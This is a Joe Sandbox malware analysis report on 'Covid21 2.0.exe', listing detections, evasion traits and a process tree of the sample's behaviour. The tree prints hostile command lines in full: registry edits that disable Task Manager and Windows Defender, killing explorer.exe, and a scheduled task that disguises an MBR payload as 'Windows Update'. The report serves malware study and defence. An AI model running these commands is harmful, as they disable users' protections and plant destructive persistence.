Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Covid21 2.0.exe

Overview

General Information

Sample Name:Covid21 2.0.exe
Analysis ID:377010
MD5:a7c7f5e792809db8653a75c958f82bc4
SHA1:7ebe75db24af98efdcfebd970e7eea4b029f9f81
SHA256:02fea9970500d498e602b22cea68ade9869aca40a5cdc79cf1798644ba2057ca
Infos:

Most interesting Screenshot:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Command shell drops VBS files
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Disables the Windows task manager (taskmgr)
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample or dropped binary is a compiled AutoHotkey binary
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes directly to the primary disk partition (DR0)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

Startup

  • System is w10x64
  • Covid21 2.0.exe (PID: 6564 cmdline: 'C:\Users\user\Desktop\Covid21 2.0.exe' MD5: A7C7F5E792809DB8653A75C958F82BC4)
    • cmd.exe (PID: 6616 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cscript.exe (PID: 6680 cmdline: cscript prompt.vbs MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
      • reg.exe (PID: 6760 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6780 cmdline: Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • CLWCP.exe (PID: 6804 cmdline: clwcp c:\covid21\covid.jpg MD5: E62EE6F1EFC85CB36D62AB779DB6E4EC)
      • reg.exe (PID: 6836 cmdline: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • wscript.exe (PID: 6888 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • cmd.exe (PID: 6912 cmdline: C:\Windows\system32\cmd.exe /K coronaloop.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Corona.exe (PID: 6984 cmdline: c:\covid21\corona.exe MD5: 6374CA8AD59246DFED4794FD788D6560)
      • timeout.exe (PID: 6932 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • inv.exe (PID: 7092 cmdline: inv.exe MD5: EBB811D0396C06A70FE74D9B23679446)
      • wscript.exe (PID: 7104 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 7120 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • z.exe (PID: 6544 cmdline: z.exe MD5: A7CE5BEE03C197F0A99427C4B590F4A0)
      • wscript.exe (PID: 744 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 768 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • mlt.exe (PID: 6804 cmdline: mlt.exe MD5: A4E26D32F9655DBE8EFD276A530EB02B)
      • wscript.exe (PID: 3136 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 1376 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • wscript.exe (PID: 5972 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • icons.exe (PID: 6056 cmdline: icons.exe MD5: 3CA1D5768C2944D4284B1541653823C7)
        • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 7052 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • screenscrew.exe (PID: 5600 cmdline: screenscrew.exe MD5: E87A04C270F98BB6B5677CC789D1AD1D)
      • wscript.exe (PID: 7080 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 5672 cmdline: timeout 5 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • wscript.exe (PID: 6932 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • timeout.exe (PID: 3912 cmdline: timeout 3 /nobreak MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • taskkill.exe (PID: 6160 cmdline: taskkill /f /im explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • PayloadMBR.exe (PID: 4112 cmdline: PayloadMBR.exe MD5: D917AF256A1D20B4EAC477CDB189367B)
        • schtasks.exe (PID: 4248 cmdline: schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeAvira: detection malicious, Label: HEUR/AGEN.1133501
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeReversingLabs: Detection: 12%
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeMetadefender: Detection: 36%Perma Link
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted fileShow sources
Source: Covid21 2.0.exeVirustotal: Detection: 69%Perma Link
Source: Covid21 2.0.exeMetadefender: Detection: 29%Perma Link
Source: Covid21 2.0.exeReversingLabs: Detection: 75%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Covid21 2.0.exeJoe Sandbox ML: detected
Source: 0.2.Covid21 2.0.exe.63145a.3.unpackAvira: Label: TR/Patched.Ren.Gen
Source: Covid21 2.0.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0040850C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,6_2_0040850C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00408604 FindFirstFileA,GetLastError,6_2_00408604
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00405210 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00405210
Source: C:\covid21\Corona.exeCode function: 12_2_00404F24 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00404F24
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00404EB8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,13_2_00404EB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0043892A _strlen,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,_strcat,18_2_0043892A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00424873 _strlen,_strcat,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,SetFileAttributesA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,18_2_00424873
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423AD5 DeleteFileA,FindFirstFileA,_strcat,_strrchr,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,DeleteFileA,FindNextFileA,FindClose,18_2_00423AD5
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0040A357 _strrchr,_strcat,_strlen,_strcat,FindFirstFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,_strlen,FindNextFileA,FindClose,18_2_0040A357
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042C368 FindFirstFileA,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,MoveFileA,DeleteFileA,MoveFileA,CopyFileA,FindNextFileA,FindClose,18_2_0042C368
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423D09 FindFirstFileA,FindClose,18_2_00423D09
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00423DE4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,18_2_00423DE4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00424DBB _strlen,_strcat,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,SetFileTime,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,CreateFileA,SetFileTime,CloseHandle,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,18_2_00424DBB
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042C603 GetFileAttributesA,FindFirstFileA,FindClose,18_2_0042C603
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00439FDC FindFirstFileA,FindClose,GetFileAttributesA,18_2_00439FDC
Source: z.exe.0.drString found in binary or memory: http://www.autohotkey.com
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000002.792846873.000000000045A000.00000002.00020000.sdmp, z.exe.0.drString found in binary or memory: http://www.autohotkey.comCould
Source: screenscrew.exe, 0000001E.00000002.792044732.000000000043B000.00000004.00020000.sdmpString found in binary or memory: http://www.rjlsoftware.com
Source: screenscrew.exe, 0000001E.00000002.793881577.00000000022C0000.00000004.00000001.sdmpString found in binary or memory: http://www.rjlsoftware.com(
Source: screenscrew.exeString found in binary or memory: http://www.rjlsoftware.com/?screenscrew
Source: screenscrew.exe, 0000001E.00000003.729503063.00000000021D0000.00000004.00000001.sdmpString found in binary or memory: http://www.rjlsoftware.com/?screenscrewopenj
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00443AE3 GetTickCount,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,18_2_00443AE3
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004218AC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,6_2_004218AC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00420B07 GetForegroundWindow,GetWindowRect,_strrchr,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,DeleteObject,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,DeleteObject,SelectObject,DeleteDC,DeleteObject,18_2_00420B07
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00435EB4 GetKeyboardState,6_2_00435EB4
Source: Covid21 2.0.exe, 00000000.00000002.754644021.000000000090A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00405D3C GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetFocus,GetFocus,GetClassNameA,_strncoll,GetFocus,SendMessageA,GetPropA,0_2_00405D3C

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionalty to change the wallpaperShow sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0046CF80 RegOpenKeyExA,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegFlushKey,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,6_2_0046CF80

Operating System Destruction:

barindex
Protects its processes via BreakOnTermination flagShow sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeProcess information set: 01 00 00 00

System Summary:

barindex
Sample or dropped binary is a compiled AutoHotkey binaryShow sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeWindow found: window name: AutoHotkeyJump to behavior
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00404714 GetWindowLongA,CallWindowProcA,RemovePropA,RemovePropA,RemovePropA,RevokeDragDrop,SetWindowLongA,NtdllDefWindowProc_A,0_2_00404714
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00407E1A sprintf,GetPropA,HeapFree,HeapFree,HeapFree,RemovePropA,CallWindowProcA,NtdllDefWindowProc_A,0_2_00407E1A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00439164 NtdllDefWindowProc_A,GetCapture,6_2_00439164
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0045543C NtdllDefWindowProc_A,6_2_0045543C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042E49C NtdllDefWindowProc_A,6_2_0042E49C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00449828 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,6_2_00449828
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00455BEC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,6_2_00455BEC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00455CB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,6_2_00455CB0
Source: C:\covid21\Corona.exeCode function: 12_2_00432908 NtdllDefWindowProc_A,GetCapture,KiUserCallbackDispatcher,12_2_00432908
Source: C:\covid21\Corona.exeCode function: 12_2_0044CEA8 NtdllDefWindowProc_A,12_2_0044CEA8
Source: C:\covid21\Corona.exeCode function: 12_2_004421FC GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,12_2_004421FC
Source: C:\covid21\Corona.exeCode function: 12_2_0042738C NtdllDefWindowProc_A,12_2_0042738C
Source: C:\covid21\Corona.exeCode function: 12_2_0044D650 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,12_2_0044D650
Source: C:\covid21\Corona.exeCode function: 12_2_0044D700 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,12_2_0044D700
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044A410 NtdllDefWindowProc_A,13_2_0044A410
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00424BF0 NtdllDefWindowProc_A,13_2_00424BF0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044ABB8 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,13_2_0044ABB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044AC68 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,13_2_0044AC68
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0043F764 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,13_2_0043F764
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0042FFB8 NtdllDefWindowProc_A,GetCapture,13_2_0042FFB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_00428F5C NtdllDefWindowProc_A,30_2_00428F5C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0042220A NtdllDefWindowProc_A,30_2_0042220A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_00422218 NtdllDefWindowProc_A,30_2_00422218
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0042E808 NtdllDefWindowProc_A,30_2_0042E808
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_004234E7: CreateFileA,DeviceIoControl,CreateFileA,DeviceIoControl,CloseHandle,18_2_004234E7
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042CAA7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,18_2_0042CAA7
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeFile created: C:\Windows\clwcp.bmpJump to behavior
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_004069600_2_00406960
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00406C100_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00458A986_2_00458A98
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0044EE086_2_0044EE08
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004650506_2_00465050
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004498286_2_00449828
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00463A686_2_00463A68
Source: C:\covid21\Corona.exeCode function: 12_2_004421FC12_2_004421FC
Source: C:\covid21\Corona.exeCode function: 12_2_004473A012_2_004473A0
Source: C:\covid21\Corona.exeCode function: 12_2_0041B3AA12_2_0041B3AA
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044490813_2_00444908
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0043F76413_2_0043F764
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_004075C418_2_004075C4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0040DE8C18_2_0040DE8C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0045885418_2_00458854
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042487318_2_00424873
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0044207B18_2_0044207B
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0041480318_2_00414803
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_004071FF18_2_004071FF
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0044522E18_2_0044522E
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0044B39518_2_0044B395
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042146618_2_00421466
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00452C2018_2_00452C20
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042F51418_2_0042F514
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0045052918_2_00450529
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_00449D8E18_2_00449D8E
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042963D18_2_0042963D
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0040CF2418_2_0040CF24
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0041B73518_2_0041B735
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0044179A18_2_0044179A
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: 30_2_0042E58C30_2_0042E58C
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe 13B4EC59785A1B367EFB691A3D5C86EB5AAF1CA0062521C4782E1BAAC6633F8A
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe E40F57F6693F4B817BEB50DE68027AABBB0376CA94A774F86E3833BAF93DC4C0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe 4172C6120F8F98685698365D6DD52C80EB2080203CDDE479009BF8F4FA770AF0
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: String function: 0046AF31 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: String function: 00442502 appears 290 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: String function: 00439871 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: String function: 00458250 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: String function: 00442545 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: String function: 0044C37D appears 49 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeCode function: String function: 004036E8 appears 118 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: String function: 0040621C appears 62 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: String function: 0040411C appears 74 times
Source: C:\covid21\Corona.exeCode function: String function: 00403E4C appears 70 times
Source: C:\covid21\Corona.exeCode function: String function: 00405ED4 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: String function: 00403E10 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: String function: 00405E68 appears 61 times
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: CLWCP.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Corona.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Corona.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamescreenscrew.exe: vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmpBinary or memory string: OriginalFilename vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.755160646.0000000000E50000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.755160646.0000000000E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Covid21 2.0.exe
Source: Covid21 2.0.exe, 00000000.00000002.754831474.0000000000D50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Covid21 2.0.exe
Source: Covid21 2.0.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: Covid21 2.0.exeStatic PE information: Section: UPX1 ZLIB complexity 0.999160245797
Source: classification engineClassification label: mal84.rans.evad.winEXE@73/19@0/0
